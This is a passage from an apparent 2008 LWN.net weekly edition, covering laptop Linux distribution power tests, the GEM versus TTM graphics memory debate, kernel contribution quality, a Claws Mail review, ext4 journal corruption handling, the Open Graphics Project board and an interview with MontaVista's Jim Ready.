usage is a low 9.0 watts; 8.8 when the "kill beagled" option is selected.
Unfortunately, this lower usage is likely to be a result of the wireless
interface not 
working.  NetworkManager is able to present a list of access points, but
does not succeed in associating with any of them.  This is a device with a
free driver, well supported in the 2.6.25 kernel shipped by openSUSE; its
failure to work is discouraging.


Many of the glitches encountered in this distribution are easily explained
by pointing out that it is a beta release.  One can only assume that many
of them will be fixed up before the final version.  With that done,
openSUSE has the potential to be a solid system for laptops; many of the
right pieces are there.  Your editor, though, will have a hard time
considering an openSUSE installation; that unpleasant EULA has left a
lasting impression.


Ubuntu 8.04

Ubuntu made its name partially through its attention to laptop
installations, so your editor had reasonably high expectations from the
"Hardy Heron" long-term-support release.  Those expectations were met, for
the most part.


The installation CD did its job, and the resulting system worked well.  The
Ubuntu time zone selector deserves special mention, though: it tries to pan
the world map under the mouse, with the effect that the target one is
aiming for moves away as one gets close.  It's a video game of sorts, but
it can be a little frustrating, especially with a laptop-style mouse
device. 


Wireless works, but Ubuntu silently installs the MadWifi driver to bring
that about.  Suspend and hibernate work, as do the various Thinkpad
buttons.  Ubuntu demonstrates some of the same backlight obnoxiousness as
the other GNOME-based distributions - but quite a bit less of it.


This system drew 9.5 watts of power, with 47 wakeups per second.  With this
configuration, disabling the wireless in NetworkManager did reduce power
usage considerably - down to 8.1 watts.  It would seem that the MadWifi
driver still knows something about powering down the hardware that ath5k
doesn't.  Even so, removing MadWifi entirely dropped consumption still
further, to 7.8 watts.


On the 2510p, things generally worked well.  Power consumption was 10.1
watts, with an amazing 217 wakeups per second, though.  Part of the problem
here appears to be a bug in the i915 driver which causes it to generate a
steady stream of interrupts if the 3D engine is engaged.  Ubuntu turns on
Compiz by default, causing the video processor to pound on the CPU.
Turning off "visual effects" cut the wakeup rate considerably.  Following
Powertop's advice and disabling the Bluetooth interface as well dropped the
system down to 9.7 watts and 50 wakeups per second.


Concluding notes

Here's a table summarizing some of the results reported above:


The second power number, when present, indicates what is achievable with
minimal tweaking: turning off wireless or letting Powertop shut things
down.  More invasive techniques (unloading modules, for example, or
changing kernel boot parameters) are not
included.

For the 2510p, the results are:


Two other distributions were tried, but did not make it all the through the
survey process:


 Gentoo.  Playing with Gentoo has been on the list for years.  So an
     install disk was downloaded and your editor launched into the "quick
     install guide."  It is clear that Gentoo employs a rather long
     value of "quick."  This guide prints over many pages, includes 39
     "code listings," requires creating each filesystem by hand, etc.  Your
     editor would still like to play with Gentoo, but there was no time for
     such an exercise now.  Life has gotten too short to go through that
     kind of obstacle course just to get Linux installed on a computer.

 Slackware.  In this case, your editor was able to get through the
     somewhat rustic Slackware 12.1 installation procedure.  It was kind of
     nostalgic to see LILO again.  The system ran, and even brought up the
     window system, but the system would lock hard as soon as your editor
     tried to bring up a terminal window.  That, too, was not the sort of
     experience which had been sought.


What comes out of all this work is that the Linux community now has a few
good options for laptop-friendly distributions.  Getting Linux running well
on a laptop need no longer be an act of advanced wizardry.

That said, there's clearly still room for improvement.  Even well-supported
hardware does not always cooperate well.  For a laptop system, in
particular, it is important to be able to power down unneeded hardware
without having to dig into the system configuration or unload kernel
modules.  If the wireless interface, FireWire port, modem, BlueTooth
interface, etc. are not being used, they should not be drawing power.
After all, if the laptop's user is going to have something to actually
do through a long series of LinuxWorld keynotes, it's important to
stretch that battery as far as possible.  Progress has been made, but there
is more to do.

Your editor must now make a choice as to which distribution will remain on
these laptops.  For the X31, the choice makes itself: Fedora.  It works the
best while installing only free software.  One could retrofit a 2.6.25
kernel into an Ubuntu installation to get the ath5k driver, but it's nicer
to not have to do that.  For the 2510p, the choice is not quite so clear.
It might, in the end, be Ubuntu for the slightly lower power consumption
and fewer backlight hassles.  The potential (not always realized) for
online upgrades might also tip things a little more in the Ubuntu
direction.  All of that will have to be traded off against Fedora's
out-of-the-box encrypted installation, though.
But either Ubuntu or Fedora is a fine choice for this machine;
it is nice to be in a position where there are a couple of high-quality
alternatives.

		GEM v. TTM


Getting high-performance, three-dimensional graphics working under Linux is
quite a challenge even when the fundamental hardware programming
information is available.  One component of this problem is memory
management: a graphics processor (GPU) is, essentially, a computer of its
own with a distinct view of memory.  Managing the GPU's memory - and its
view of system RAM - must be done carefully if the resulting system is
intended to work at all, much less with acceptable performance.


Not that long ago, it appeared that this problem had been solved with the
translation table maps (TTM)
subsystem.  TTM remains outside of the mainline kernel, though, as do
all drivers which use it.  A recent query
about what would be required to get TTM merged led to an interesting
discussion where it turned out that, in fact, TTM may not be the future of
graphics memory management after all.


A number of complaints about TTM have been raised.  Its API is far larger
than is needed for any free Linux driver; it has, in other words, a certain
amount of code dedicated to the needs of binary-only drivers.  The fencing
mechanism (which manages concurrency between the host CPUs and the GPU) is
seen as being complex, difficult to work with, and not always yielding the
best performance.  Heavy use of memory-mapped buffers can create performance
problems of its own.  The TTM API is an exercise in trying to provide for
everything in all situations;  as a result it is, according to some
driver developers, hard to match to
any specific hardware, hard to get started with, and still insufficiently
flexible.  And, importantly, there is a
distinct shortage of working free drivers which use TTM.  So Dave Airlie worries:


	I was hoping that by now, one of the radeon or nouveau drivers
	would have adopted TTM, or at least demoed something working using
	it, this hasn't happened which worries me...  The real question is
	whether TTM suits the driver writers for use in Linux desktop and
	embedded environments, and I think so far I'm not seeing enough
	positive feedback from the desktop side


All of these worries would seem to be moot, since TTM is available and
there is nothing else out there.  Except, as it turns out, there is
something out there: it's called the Graphics Execution Manager, or GEM.
The Intel-sponsored GEM project is all of one month old, as of this writing.
The GEM developers had not really intended to announce
their work quite yet, but the TTM discussion brought the issue to the fore.

Keith Packard's introduction to GEM includes a
document describing the API as it exists so far.  There are a number of
significant differences in how GEM does things.  To begin with, GEM
allocates graphical buffer objects using normal, anonymous, user-space
memory.  That means that these buffers can be forced out to swap when
memory gets tight.  There are clear advantages to this approach, and not
just in memory flexibility: it also makes the implementation of suspend and
resume easier by automatically providing backing store for all buffer
objects.


The GEM API tries to do away with the mapping of buffers into user space.
That mapping is expensive to do and brings all sorts of interesting issues
with cache coherency between the CPU and GPU.  So, instead, buffer objects
are accessed with simple read() and write() calls.  Or,
at least, that's the way it would be if the GEM developers could attach a
file descriptor to each buffer object.  The kernel, however, does not make
the management of that many file descriptors easy (yet), so the real API
uses separate handles for buffer objects and a series of ioctl()
calls. 

That said, it is possible to map a buffer object into user space.  But then
the user-space driver must take explicit responsibility for the management
of cache coherency.  To that end there is a set of ioctl() calls
for managing the "domain" of a buffer; the domain, essentially, describes
which component of the system owns the buffer and is entitled to operate on
it.  Changing the domains (there are two, one for read access and one for
writes) of a buffer will perform the necessary cache flushes.  In a sense,
this mechanism resembles the streaming DMA API, where the ownership of DMA
buffers can be switched between the CPU and the peripheral controller.
That is not entirely surprising, as a very similar problem is being solved.

This API also does away with the need for explicit fence operations.
Instead, a CPU operation which requires access to a buffer will simply
wait, if necessary, for the GPU to finish any outstanding operations
involving that buffer.

Finally, the GEM API does not try to solve the entire problem; a number of
important operations (such as the execution of a set of GPU commands) are
left for the hardware-specific driver to implement.  GEM is, thus, quite
specific to the needs of Intel's driver at this time; it does not try for
the same sort of generality that was a goal of TTM.  As described by Eric Anholt:


	The problem with TTM is that it's designed to expose one general
	API for all hardware, when that's not what our drivers want...
	We're trying to come at it from the other direction: Implement one
	driver well.  When someone else implements another driver and finds
	that there's code that should be common, make it into a support
	library and share it.


The advantage to this approach is that it makes it relatively easy to
create something which works well with Intel drivers.  And that may well be
a good start; one working set of drivers is better than none.  On the other
hand, that means that a significant amount of work may be required to get
GEM to the point where it can support drivers for other hardware.  There
seem to be two points of view on how that might be done: (1) add
capabilities to GEM when needed by other drivers, or (2) have each
driver use its own memory manager.


The first approach is, in many ways, more pleasing.  But it implies that
the GEM API could change significantly over time.  And that, in turn, could
delay the merging of the whole thing; the GEM API is exported to user
space, and, as a result, must remain compatible as things change.  So there
may be resistance to a quick merge of an API which looks like it may yet
have to evolve for some time.  

The second approach, instead, is best described by Dave Airlie:


	Well the thing is I can't believe we don't know enough to do this
	in some way generically, but maybe the TTM vs GEM thing proves its
	not possible.  So we can then punt to having one memory manager per
	driver, but I suspect this will be a maintenance nightmare, so if
	people decide this is the way forward, I'm happy to see it
	happen. However the person submitting the memory manager n+1 must
	damn well be willing to stand behind the interface until time ends,
	and explain why they couldn't re-use 1..n memory managers.


One other remaining issue is performance.  Keith Whitwell posted some benchmark results showing that the
i915 driver performs significantly worse with either TTM or GEM than
without.  Keith Packard gets different
results, though; his tests show that the GEM-based driver is significantly
faster.  Clearly there is a need for a set of consistent benchmarks;
performance of graphics drivers is important, but performance cannot be
optimized if it cannot be reliably measured.


The use of anonymous memory also raises some performance concerns: a
first-person shooter game will not provide the same experience if its
blood-and-gore textures must be continually paged in.  Anonymous memory can
also be high memory, and, thus, not necessarily accessible via a 32-bit
pointer.  Some GPU hardware cannot address high memory; that will likely
force the use of bounce buffers within the kernel.  In the end, GEM will
have to prove that it can deliver good performance; GEM's developers are
highly motivated to make their hardware look good, so there is a reasonable
chance that things will work out on this front.


The conclusion to draw from all of this is that the GPU memory management
problem cannot yet be considered solved.  GEM might eventually become that
solution, but it is a very new API which still needs a fair amount of
work.  There is likely to be a lot of work yet to be done in this area.


(Thanks to Timo Jyrinki for suggesting this topic.)

		Getting the right kind of contributions


Most free software projects encourage contributors—it is the rare
project that has an overabundance—but contributions vary
greatly in quality.  Encouraging good submissions, or those likely to lead
to useful contributions down the road, is an important part of any
project.  But it is a delicate balance.  It can be difficult to determine
the kinds of tasks suitable for new contributors that will lead to more important
contributions later.


The flip side of that coin is how to handle contributions that appear to
lead elsewhere.  Just wading through the significant submissions on a large
project's mailing list—linux-kernel being an excellent
example—is extremely time consuming; adding noise, in the form of
less-than-completely-useful patches, only makes that job harder.   New
contributors generally want to start with something relatively easy,
though, which leads to the tension.


Discouraging patches that aren't particularly useful in a way that won't
chase off prospective kernel hackers is hard.  Al Viro's rather intemperate
call for discussion of a linux-wanking mailing
list on linux-kernel is probably not the right approach.  He was responding to a patch
that reformatted a kernel header file to 
line up the arguments.  Viro is not known for his diplomatic skills, but he
was responding to a problem that he and other kernel hackers see.  There is
an increasing amount of trivial cleanup work being submitted that is not translating to
more substantial, useful contributions later on.


In a followup post, 
Viro explains his concern:

We are getting another self-contained area.  Namely, "pick a
pointless mechanical work out of ever-growing pile, do it, learn nothing,
pick more, maybe look into finding new classes of such mindless stuff".
Of course it always had been there; what changes is that now it's not
just a transient state one might hit on the way in to be slightly
embarrassed
about years later.  It gets more visible, it gets self-sustained and it
gets more and more sticky - it became a subculture in its own right and
as far as I can see it is offering more and more incentives to stay in it
instead of moving on.


There is a real cost associated with posts to linux-kernel.  It is the main
communication mechanism for kernel development so those involved need to
work through the posts there.  David Miller laments the time he spends sorting through it
all: 

After deleting all of the noise posted here, I'm often too burnt out
to do real work with what's left and just delete that too. :-/
It's worse than the postmaster and list owner mail I process each
day for vger.kernel.org

Wouldn't you like me to instead have the energy left to review some
useful patches?


The kernel project provides a number of resources for people who are
interested in getting involved but don't know where and how to start.  The
Kernel Newbies effort is
specifically designed to help people get started with the kernel by
running a wiki, mailing list, and IRC channel that are focused on the needs
of, well, newbies.  The idea is to provide information and mentoring that
will lead to useful contributions to the kernel.


A subproject is the Kernel
Janitors who focus on cleaning up kernel code:

We go through the Linux kernel source code, doing code reviews, fixing up
unmaintained code and doing other cleanups and API conversions. It is a
good start to kernel hacking. 


Both of these efforts are targeted at getting people up to speed so that
the kernel as a whole improves.  All of the work is important, but there
are many other kernel tasks that are not getting done, possibly because
contributors are concentrating on cleanups.  Andrew Morton has some suggestions for interested folks:

One could understand a developer deciding to write a do-nothing
whitespace patch as a general throat-clearing exercise, but when asked,
I recommend against that.  I generally recommend that people just
download and test the latest -rc, linux-next and -mm kernels and build
and run them.  Because they surely will find things which need fixing.
Often simple little things like compilation errors, sometimes things
which need a bisection search.


One problem, though, is that much of that work is more difficult than a
whitespace cleanup.  For those who are interested in getting their name "up
in lights"—in the form of a kernel commit message—the trivial
patch path appears easier.  Responses like Viro's may deter them, but it
risks making linux-kernel look like a hostile place that does not encourage
new developers.


Some extremely important kernel tasks often do get little or no
recognition.  Submitting detailed bug reports, bisecting the kernel to find
the patch that broke things, or testing proposed fixes go
unrecognized—at least in the kernel commit log.  There have been
thoughts of adding tags to the patches that would note these contributions,
but no concrete proposal has been made.


Two other documentation efforts are underway to assist new kernel
developers.  Jesper Juhl is working on a Kernel
Newbies Guide to be included into the kernel Documentation
tree.  It may get folded into Documentation/HOWTO or as a separate
file, but the idea is to steer folks in the right direction—and away
from the kinds of patches that raise the ire of kernel hackers.  LWN's
Jonathan Corbet also mentioned a longer
document he is working on with support from the Linux Foundation that should
be ready for review in June.  


There may be some rudeness or hostility towards new developers on linux-kernel, but it rarely
rises to the level seen on the openbsd-misc mailing list last October.  In
response to a query about a list of less complicated tasks for
OpenBSD—similar to what the Linux Kernel Janitors
maintain—project leader Theo de Raadt, who is really not noted
for his diplomacy, blasts:

Surely they are too busy whining at us for lists, to actually search
for the lists.

I'll say it again more clearly -- all of you whiners just plain suck.
We know you'll never write diffs, and it is up to you to prove us
wrong.  If you don't write diffs, we have a difficult time feeling any
loss.


This is sort of the extreme end of the "show us the code" attitude, but, in
his own inimitable way, de Raadt is reacting to the same problem.  It takes
time and effort to shepherd new kernel hackers.  Spending time mentoring
folks who will never end up contributing is a waste; that time is better
spent finding, fixing, or adding bugs.  As Linux hacker Ted Ts'o puts it:

The real question is whether people who are wanking about whitespace
and spelling fixes in comments will graduate to writing real, useful
patches.  If they won't, there's no point to encouraging them.


How does a project determine which newly interested people will end up
being useful contributors versus those that will not?  It is a difficult
problem that warrants some thought.  It surely isn't just kernel projects
that have it, as any large, high-profile project will have both a fairly
high barrier to entry along with some developers who should be
discouraged.


Obviously there will never be a
clear-cut "future contributor" test, but there may be ways to get a better
idea.  In the meantime, flaming well-meaning folks to a crisp is unlikely
to get there. Referring 
inappropriate patches to Linux Newbies or something similar—on the
off chance the person can be redirected—might be a start.


		The Grumpy Editor reviews Claws Mail


The Grumpy Editor's guide to
graphical email clients was published almost exactly four years ago.
At that time, your editor was looking for a client which could replace an
MH-based setup which, for all its age, provided a degree of speed and
flexibility which was hard to match.  Your editor gets a lot of mail - even
before lists like linux-kernel are factored in - so there is a real need
for a mail client which can process messages without adding even a few
seconds of overhead.  At that time, none of the clients reviewed were up to
the task; it seems that developers of graphical clients value a number of
features above speed and flexibility.


That review mentioned a client called sylpheed-claws; at that time, this
client was being managed as a sort of development branch for sylpheed, with
every intent of getting changes back into that system.  Since then,
sylpheed-claws has evolved into a full fork intended to create an
independent application; it's new name is Claws Mail.  In 2004, your editor had
found sylpheed-claws to be an unstable platform at best; in 2008, it seemed
like time to go back and see what the developers had accomplished in the
last four years.  To that end, Claws Mail 3.4.0 was installed and put
through its paces.

The good news is that this client has, indeed, stabilized over time.  Your
editor was unable to make it crash - always a nice feature in a mail
client.  Many of the features which were under development four years ago
are now stable and supported - and, generally, well documented.  Claws Mail
has come a long way.

 
The Claws Mail developers emphasize configurability, so there's a wide
variety of options to wander through.  The layout of the window is highly
configurable, allowing the user to make the best use of the available
screen space.  Most aspects of the client's behavior can be tweaked.  For
somebody who is willing to wander through a long series of configuration
screens, Claws Mail offers the ability to adapt the client to just about
any set of needs.


Dealing with email is a keyboard-intensive activity.  One of your editor's
biggest complaints with graphical clients has been the need to switch
constantly between the keyboard and the mouse - a transition which breaks
focus and steals
time.  Claws Mail has improved things in this regard, in that a wide
variety of actions can be handled without the mouse.  And, unlike some
other graphical clients, changing the keyboard bindings is easily done.


For some simple operations - plowing through a mail folder, reading and
deleting messages - Claws Mail can be visibly slow.  Working over IMAP does
not help, of course, but it is slower than with, for example, Thunderbird.
In addition, by default, Claws Mail will not display a message which
becomes selected as the result of, say, deleting the message before it.  So
the cycle of deleting a message and viewing the next one requires two
keystrokes or clicks.  That particular problem can be configured away, of
course.  Much of the remaining slowness can be mitigated by turning off the
"execute moves and deletes immediately" option - a change which also makes
it easier to recover from overzealous "delete finger" reflexes.


One common bit of workflow for your editor involves feeding a message to an
external program.  As a general rule, graphical mail clients do not make
this possible, though this feature is almost universal in non-graphical
clients.  Claws Mail includes the concept of "actions," which are,
essentially, external programs which act on messages.  This feature
almost solves the problem; actions can be set up with quite a bit of
flexibility, and they can be bound to keystrokes.  But there is no
equivalent to the "|" operation provided by textual clients, meaning that
it's not possible to pipe a message into an arbitrary command.  Claws
Mail only passes through the mail headers which are visible on the screen -
and there appears to be no way to configure that behavior.


HTML mail appears to be an unfortunate fact of life on the contemporary
net.  Claws Mail will render such mail as text by default; there are also a
couple of plugins which can render HTML mail as intended by its sender.  It
warmed your editor's heart to note that Claws Mail (unlike certain other
clients) does not send HTML mail by default.  In fact, it lacks the ability
to send HTML mail at all.  These developers seem to have their priorities
in the right place.


Offline operation is another nice feature in a mail client.  Claws mail has
such a feature, but your editor was only able to get it partially working.
The client can gather up mail for offline reading, but changes and sending
of mail lead to a series of "I can't do this" dialogs.  Some more
configuration (e.g. setting up a local drafts folder) helps in this regard,
but this area looks a bit like a work in progress.


There's no end of other features, of course.  Claws mail supports encrypted
mail, spelling checking, filtering of messages on arrival (with an
optional Perl plugin for those especially complicated filtering jobs), a
mail template facility, color-labeling of mail, tagging, scoring, watching
of threads, and more.  There are plugins which will turn on a laptop LED
when mail arrives, strip attachments, view PDF files, track RSS feeds, deal
with vCalendar messages, etc.  There is a complex search mechanism which
can do a lot more than just string matches.  It is, in summary, a highly
capable tool with more features than just about anybody is likely to use.


So has your editor made the change?  Not yet.  Ways around some of the speed
issues will have to be found, and it may be necessary to write a plugin to
make Claws Mail work with some LWN processes.  A few other details need to
be made to work correctly.  But it can be said that Claws Mail has gotten
closer than any other graphical mail client that your editor has tried to
date.

		Responding to ext4 journal corruption


Last week's article on
barriers described one way in which things could go wrong with journaling
filesystems.  Therein, it was noted that the journal checksum feature added
to the ext4 filesystem would mitigate some of those problems by preventing
the replay of the journal if it had not been completely written before a
crash.  As a discussion this week shows, though, the situation is not quite
that simple.


Ted Ts'o was doing some ext4 testing when he noticed a problem with how the journal
checksum is handled.  The journal will normally contain several
transactions which have not yet been fully played into the filesystem.
Each one of those transactions includes a commit record which contains,
among other things, a checksum for the transaction.  If the checksum
matches the actual transaction data in the journal, the system knows that
the transaction was written completely and without errors; it should thus
be safe to replay the transaction into the filesystem.


The problem that Ted noticed was this: if a transaction in the middle of
the series failed to match its checksum, the playback of the journal would
stop - but only after writing the corrupted transaction into the
filesystem.  This is a sort of worst-of-all-worlds scenario: the kernel
will dump data which is known to be corrupt into the filesystem, then
silently throw away the (presumably good) transactions after the bad one.  The
ext4 developers quickly arrived at a consensus that this behavior is a bug
which should be fixed.


But what should really done is not as clear as one might think.  Ted's
suggestion was this:


	So I think the right thing to do is to replay the *entire* journal,
	including the commits with the failed checksums (except in the case
	where journal_async_commit is enabled and the last commit has a bad
	checksum, in which case we skip the last transaction).  By
	replaying the entire journal, we don't lose any of the revoke
	blocks, which is critical in making sure we don't overwrite any
	data blocks, and replaying subsequent metadata blocks will probably
	leave us in a much better position for e2fsck to be able to recover
	the filesystem.


A bit of background might help in understanding the problem that Ted is
trying to solve here.  In the default data=ordered mode, ext3 and
ext4 do not write all data to the journal before it goes to the filesystem
itself.  Instead, only filesystem metadata goes to the journal; data
blocks are written directly to the filesystem.  The "ordered" part means
that all of the data blocks will be written before the filesystem code will
start writing the metadata; in this way, the metadata will always describe
a complete and correct filesystem.

Now imagine a journal which contains a set of transactions similar to these
(in this order):


 A file is created, with its associated metadata.

 That file is then deleted, and its metadata blocks are released. 

 Some other file is extended, with the newly-freed metadata blocks 
     being reused as data blocks.


Imagine further that the system crashes with those transactions in the journal,
but transaction 2 is corrupt.  Simply skipping the bad transaction and
replaying transaction 3 would lead to the filesystem being most
confused about the status of the reused blocks.  But just stopping at the
corrupt transaction also has a problem: the data blocks created in
transaction 3 may have already been written, but, as of
transaction 1, the filesystem thinks those are metadata blocks.  That,
too, leads to a corrupt filesystem.  By replaying the entire journal, Ted
hopes to catch situations like that and leave the filesystem in an overall
better shape.

It is, perhaps, not surprising that there was some disagreement with this
approach.  Andreas Dilger argued:


	The whole point of this patch was to avoid the case where random
	garbage had been written into the journal and then splattering it
	all over the filesystem.  Considering that the journal has the
	highest density of important metadata in the filesystem, it is
	virtually impossible to get more serious corruption than in the
	journal.


The next proposal was to make a change to
the on-disk journal format ("one more time") turning the per-transaction
checksum into a per-block checksum.  Then it would be possible to get a
handle on just how bad any corruption is, and even corrupt transactions
could be mostly replayed.  As of this writing, that looks like the approach
which will be taken.


Arguably, the real conclusion to take from this discussion was best expressed by Arjan van de Ven in
an entirely different context: "having a journal is soooo
1999".  The Btrfs filesystem, which has a good chance of replacing
ext3 and ext4 a few years from now, does not have a journal; instead, it
uses its fast snapshot mechanism to keep transactions consistent.  Btrfs
may, thus, avoid some of the problems that come with journaling - though,
perhaps, at the cost of introducing a set of interesting new problems.

		The Open Graphics Project prepares to release hardware


The Open Graphics Project is working to produce an open-hardware
PCI graphics card with open-source drivers. The
Wikipedia entry
for OGP is a good source for information on the project.
The OGP project vision is detailed in the

About document:


There is a market for graphics hardware with good support for free software and free operating systems (there may or may not be a market for open graphics hardware also, but that is beyond the scope of this project). Such a graphics card would benefit from lower software development cost and mindshare in order to be commercially viable. Free software could benefit from the active cooperation of the manufacturer of such a card to create better drivers and to get a card that better meets the requirements of free software.
Currently, the market for such cards is not served very well. NVIDIA has no offering in this market, ATI's older cards have very limited support, while their new ones have none, and Matrox has no offering in this market either. XGI are off to a good start but still no 3D code yet.
In order to get manufacturers to make such hardware, we have to show that it will be economically viable to do so.


OGP is working with the company
Traversal Technology
to develop the hardware side of the project, known as the OGD1.
OGP recently

announced that it is now taking
pre-orders
for the OGD1 board.  The card will initially cost $1500, there will
be a $100 discount for the first 100 orders.
Larger quantity orders will receive a significant discount.


The initial price may seem rather high for a video card when similar
mass-produced products can be had for several hundred dollars.
This can partly be justified by the fact that the OGD1 is more of
a development platform than a commodity video card.
The OGD1 is also useful for embedded and stand-alone video products,
where commodity parts are not available and custom designs are expensive.
Additionally, part of the money raised by selling OGD1 cards will be
used to raise funds for OGP.
The OGD1 FAQ
addresses the price issue:
"OGD1 is actually very competitively priced compared to FPGA kits with similar capabilities and capacity. For very small FPGA projects, OGD1 may be over-kill. But for larger projects, OGD1 is a must and a bargain."


The 
OGD1 rev B hardware specs explain the board's features and show
a photo of the board.
The basic capabilities include a maximum resolution of 2560x1600 pixels,
256MB of 200Mhz video memory, DVI, RGB, S-Video and composite video
outputs, a PCI/PCI-X interface and user-specified I/O.


A number of commercial video card manufacturers have been
warming up to the concept of open-source drivers.
For several years, Intel's policy has been to provide free drivers for
all of their video products.
ATI has released documentation for their Graphical Processing Unit (GPU)
and AMD is also supporting open-source drivers.
The LWN
2007 kernel summit
coverage notes:
"Starting with the R500 chipset and going forward, AMD will fully support free drivers for all of its graphics processors. This support will not take the form of a release of the current proprietary ATI driver; that code is not considered to be something that anybody would really want to look at. So there will be a clean start. AMD will release specifications and a skeleton driver with the plan to have 2D support working by the end of the year. The company is clearly hoping that the community will do much of the work on the driver, but it also plans to participate actively in the process."


While the OGD1 is somewhat in competition with commercial video card
manufacturers, the developers are encouraging the release of more
open-source drivers and specification information.  According to the
OGD1 FAQ:
"We applaud ATI for doing the right thing and making available their GPU documentation for use by Free Software developers. There are certain market segments where ATI's offering may affect us, but there are other market segments (e.g. embedded systems, single-board computers, servers, special-purpose, etc.) where our growth potential is entirely unaffected. Moreover, they in no way impact our broader goals of enabling hardware hacking and bringing open hardware to the people."


If you are a developer who is wanting to get involved in the development
of video card firmware, or you need a well-supported video architecture
for an embedded project, the OGD1 could prove to be an effective
solution.


		An interview with Jim Ready


Jim Ready has a long history in the embedded systems market.  Most
recently, he became the founder of MontaVista, now one of the most
successful embedded Linux companies.  A recent LWN article took issue
with some of Jim's comments; it only seemed fair to give him the
opportunity to present his side of the story.  Thus, this interview.  We
asked several questions about MontaVista and its approach to Linux
marketing, and Jim took quite a bit of time to answer them in detail.  So,
without further ado...


You have been working in the embedded Linux market for some years.  How has
that market changed over that time?  What do you think are the prospects
for embedded Linux now?


The single biggest change, and one that gives me great pleasure, is that
embedded Linux is now mainstream, part of the landscape, and arguably the
fastest growing embedded OS. Believe me, when we started in 1999 that was
hardly the case. Of course, the complexity of the devices that our
customers are building continues to increase. The underlying hardware is
typically a highly integrated system with loads of I/O, for example the
SOCs (System On a Chip) such as the TI 3430. That in turn drives both
complexity in Linux as well as in the application and middleware software
stacks. It's pretty amazing to realize that a little Linux-based
handheld device running on batteries is powerful enough to have supplied
the State of California government's computing needs not so many years
ago.


Where do you think MontaVista's sweet spot is in that market?


Companies who are highly focused on their value-add who want a first class
partner to supply them a suitable Linux and associated services (consulting
and training etc.) upon which they will develop their application. The more
formal approach a company takes towards their own software development, the
more they care about meeting schedules and the higher their requirements
for quality, the "sweeter" MontaVista looks. When you're basing a
billion dollar product line on someone's OS you care about what's
going in your product. So when Motorola, NEC or Panasonic end up shipping
30 million phones, they need a supplier who can meet their technical,
schedule and quality requirements. The phones have to ship for the
Christmas season, and no one wants to recall millions of devices. 

As
another example, our Carrier Grade Linux distribution is the core OS in
deployed NEC systems which have established 99.9999% availability
(that's no more than ~31.5 seconds of unscheduled downtime in a year,
which is a DoCoMo requirement). Our Professional Edition is the OS for two
different patient monitoring systems that have been through FDA
certification. We're truly fortunate to have thousands of customers,
both big and not-so-big.


Embedded systems vendors have, as a group, been criticized for their lack
of participation in the free software development process.  Are you happy
with MontaVista's level of contribution?  What, in your mind, are some of
the highlights of MontaVista's community participation?


Most contribution surveys show MV in the top 10 of Linux contributors. (No
other embedded Linux vendor even makes it into the top 30) Arguably
MontaVista contributes more to Linux relative to our size than any other
company in the world. It has always been a cornerstone of our strategy to
be a major contributor to Linux. We figured the more gas we poured on the
Linux fire the faster we could erode the RTOS suppliers installed base and
speed to movement towards Linux. We are perhaps best known for our work in
helping making Linux real-time capable but over time we have also made
significant contributions in the PPC, XScale, MIPS and ARM trees as well as
some other specific projects such as kgdb, LTT, DPM (Dynamic Power
Management) etc.


Your recent article
in Military Embedded Systems was seized upon by a 
proprietary embedded vendor as proof that Linux is too expensive and
difficult for embedded applications.  Assuming you disagree with his
conclusions, where do you think his reasoning went wrong?


Well there really wasn't any reasoning, just ranting. But having said
that Dan (Dan O'Dowd Greenhills' CEO) implied that our business model
was to allow customers to more or less get  in trouble by developing their
own from scratch Linux distribution and then charge them for support to
bail them out. Of course that's not what we do. Rather we build a robust
fully tested and supported embedded Linux distribution (MontaVista Linux
Professional Edition, for example) and deliver that to our customers. We
then maintain and support that specific version of MontaVista Linux over
time, even as the community dashes forward. In fact we have maintenance
obligations that can be as long as a decade from initial deployment. 

That
approach gets the customer out of the business of making their own
distribution, maintaining and supporting it with all the accompanying
costs. So we shield the customer from the complexity and change rate that
they otherwise would be exposed to if they were on their own. They don't
have to watch all the patches, monitor the newsgroups and otherwise be tied
up, they can get on to building their product. Dan purposely ignored the
fact that a commercial embedded Linux distribution makes it very easy to
use Linux as an embedded OS. I suspect that's why he tried to hide it.


Your article suggests that an embedded systems manufacturer using Linux
would start by assembling the kernel and development toolchain by hand.
Why do you think they would do that?  Even in the absence of vendors like
MontaVista, there are numerous options which do not require assembling
systems at such a low level; why would a vendor not use one of them?


We know from direct experience that even starting with what appears to be
"pre-assembled" distribution, from a semiconductor maker or
elsewhere, a developer sometimes isn't getting what they think they
are. 


Don't get me wrong, almost any Linux distribution can serve as a
starting point, maybe 99.99% perfect, but our customers demand more than
that. They want to be at the end of the Linux development cycle, not the
beginning. For example, a Linux distribution we recently started working
with had the following problems:


 The code explicitly ignored Linux coding standards by adding hardware
dependencies.  That code would never be accepted into the upstream trees,
and this kind of fork creates debugging issues and additional maintenance
burden.


 The drivers were not SMP-safe, real-time safe nor did they support DPM, yet
the device was designed for applications where all three could well be
required.  In order to take advantage of these advanced features, the
device driver would need to be re-written from scratch.


 The code contained numerous defects that caused the system to crash. Error
returns were not checked and other problems indicating very poor coding
practices.  These are exactly the type of quality issues that should compel
businesses to find a Linux commercialization partner.


We had the great pleasure of fixing all these problems as we assembled our
distribution. Even with our standard practice of pushing back the changes,
as you well know, there is no guarantee by the community that these changes
make it back into the appropriate open source trees. 


The fact is it is difficult for a prospective Linux developer to have any
idea of the state of the Linux distribution they might select. A high
quality, commercial distribution can give a developer some peace of mind
about what they are getting. For example, MontaVista has a formal
development process in place for each of its releases, with quantitative
criteria that must be met for defects (0 critical defects for example with a
sharply declining overall new defect detection curve.) before the
distribution can ship. Our processes have been formally audited by a number
of our largest customers in order to assure themselves of what they are
getting from us. And as we mentioned above, the proven results from devices
in the field speak to our abilities. As for other starting points,
you'll have to ask them about their process.


There were some interesting numbers in that article.  Where did the
5000 messages/day for kernel.org come from - which lists?  


Since our engineers live and breathe Linux and the other Open Source
components that make up and embedded Linux distribution, we have a pretty
good feel for the overall rate of traffic we keep up with. Based upon that
experience we measured the overall message traffic that a developer would
have to monitor to keep abreast of the daily ins and outs of the typical
mix of software they would use for an embedded Linux project. We aggregated
the total under kernel.org, which isn't precisely correct, but the
paragraph preceding that statement clearly referred to a set of lists one
would have to monitor. 

For example,  the monitoring would include not only
lkml, but also the lists for other significant parts of the software
typically used for an embedded project, including the list maintained for
the specific architecture used (MIPS, PPC ARM etc), the real-time list,
networking, IPv6, security, advanced filesystems etc. By the way, the lkml
list on May 21, 2008 contained ~500 messages, and gcc contained ~100, just
for starters. So it wasn't just lkml at 5000 but a total set that can
total up to 5000 per day. Does the fact that lkml is only ~500 a day (and
"only" ~200-300 on weekends) make it any less daunting? I don't
think so.


You say: "a recent security patch that took all of 13 lines of code to
